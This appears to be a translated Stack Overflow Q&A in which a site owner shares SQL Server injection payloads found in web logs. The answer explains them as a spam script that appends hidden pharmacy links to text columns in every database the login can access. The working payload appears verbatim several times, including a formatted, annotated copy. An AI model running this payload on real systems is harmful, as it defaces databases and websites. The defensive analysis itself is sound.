我在日志中发现以下异常:
mt: 15867';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in
('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case
ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''inderal 10mg ''+char(60)+''a href="http:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''Keflex-Pill"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''blog.coepd.com'''' when 1 then ''''blog.coepd.com'''' else
''''blog.coepd.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in
(2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--<br/> sess: 2<
注入载荷从 `;declare` 开始,到 `--` 结束。我的所有 SQL 查询都应该是参数化的,但如果有遗漏,我需要消除这个威胁。
我最好的选择是什么?我有一个专用的数据库 Web 登录帐户。把此 Web 登录帐户的权限降到最低,或拒绝其访问特定 SQL 对象,最佳实践是什么?
这个人想做什么?这是另一个黑客尝试:
;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into
@w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''tadalafil 40mg ''+char(60)+''a
href="http:''+char(47)+char(47)+''www.guitar-frets.com''+char(47)+''blog''+char(47)+''page''+char(47)+''synthroid-200mcg.aspx"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''levofloxacin 750mg'''' when 1 then ''''guitar-frets.com'''' else ''''guitar-frets.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' valacyclovir
pill''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin
exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--<br
这是我的日志的快照。如果从下往上看,可以发现攻击者正在逐个尝试每个请求参数来注入他的代码。
最佳答案
正如其他人所说,使用参数化 SQL 查询。另外注意,这段脚本只会遍历当前登录有访问权 (has_dbaccess) 的数据库,并且依赖对表的 UPDATE 权限和动态 EXEC 才能生效,因此把 Web 登录帐户限制在单一数据库、只授予必需的表或存储过程权限,也能缩小此类载荷的影响范围。
下面是格式化后的 SQL:
-- NOTE(review): attacker payload re-indented for analysis; do not execute.
-- Outer loop: enumerate every database the injected login can reach
-- (Has_dbaccess != 0), excluding the system databases, and run @s in each.
DECLARE @b CURSOR;
DECLARE @s VARCHAR(8000);
DECLARE @w VARCHAR(99);
SET @b=CURSOR
FOR SELECT Db_name()
UNION
SELECT NAME
FROM sys.databases
WHERE ( Has_dbaccess(NAME) != 0 )
AND NAME NOT IN ( 'master', 'tempdb', 'model', 'msdb', Db_name() );
OPEN @b;
FETCH next FROM @b INTO @w;
WHILE @@FETCH_STATUS = 0
BEGIN
-- The database name @w is spliced into 'use <db>' and the whole inner script
-- is assembled as one string, then executed per database with EXEC.
SET @s='begin try use ' + @w
+
';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''inderal 10mg ''+char(60)+''a href="http:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''Keflex-Pill"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''blog.coepd.com'''' when 1 then ''''blog.coepd.com'''' else ''''blog.coepd.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch'
;
-- The string above generates one UPDATE per varchar/nvarchar column whose
-- CHARACTER_MAXIMUM_LENGTH is -1 or 2147483647 (MAX-length columns) and appends
-- a hidden <div> of spam links to about 1 row in 10 (NEWID() checksum mod 10 = 0);
-- the other rows get an empty string appended. Any error is swallowed by the
-- empty BEGIN CATCH ... END CATCH, so failures never surface.
EXEC (@s);
FETCH next FROM @b INTO @w;
END;
CLOSE @b--<br/> sess: 2<
以及 @s 中的内部查询(它原本是字符串内容,因此单引号被加倍):
-- NOTE(review): contents of @s from the outer script, re-indented for
-- analysis; the doubled '' quotes are string-literal escaping. Do not execute.
;
DECLARE @c
CURSOR;DECLARE @d VARCHAR(4000);SET @c=
CURSOR FOR
-- Builds one dynamic UPDATE per matching column; the new value is the old
-- value with the CASE result appended, not a replacement.
SELECT ''UPDATE [''+TABLE_NAME+'']
SET [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+
-- About 1 row in 10 (NEWID() checksum mod 10 = 0) gets the hidden div with
-- spam links; every other row gets an empty string appended.
CASE Abs(Checksum(Newid()))%10
WHEN 0 THEN ''''''+Char(60)+''div style="DISPLAY:none"'' +char(62)+''inderal 10mg ''+char(60)+''a href="HTTP:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''keflex-pill"'' +char(62)+''''''+
-- Inner CASE picks the visible anchor text; all three branches are the same
-- string here.
CASE abs(checksum(newid()))%3
WHEN 0 THEN
''''blog.coepd.com''''
WHEN 1 THEN
''''blog.coepd.com''''
ELSE ''''blog.coepd.com''''
END
+''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+''''''
ELSE ''''''''
END
-- Target columns: DATA_TYPE LIKE '%varchar' (varchar and nvarchar) with
-- CHARACTER_MAXIMUM_LENGTH -1 or 2147483647, i.e. MAX-length columns, joined
-- through sysindexes/sysobjects with indid 0 or 1 (presumably one row per
-- base table -- confirm against the engine's catalog docs).
'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN information_schema.columns ON o.NAME=table_name WHERE(
indid IN (0,
1)
)
AND
data_type LIKE ''%varchar''
AND
(
character_maximum_length IN (2147483647,
-1)
);OPEN @c;FETCH next
FROM @c
INTO @d;WHILE @@FETCH_STATUS=0
BEGIN
-- Each generated UPDATE is executed; the empty CATCH below swallows any
-- failure (e.g. a column the login cannot update), so the loop continues silently.
EXEC (@d);
FETCH next
FROM @c
INTO @d;
END;CLOSE @c
end tryBEGIN catch
END catch
他们基本上是在遍历当前登录能访问的每个数据库,试图更新其中所有 MAX 长度的 varchar/nvarchar 列,在原有内容后面附加一段隐藏的垃圾链接。
所以这只是一个垃圾邮件脚本,试图为一些“神奇药丸”做广告。
关于c# - 有人试图侵入我的网站,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/36589298/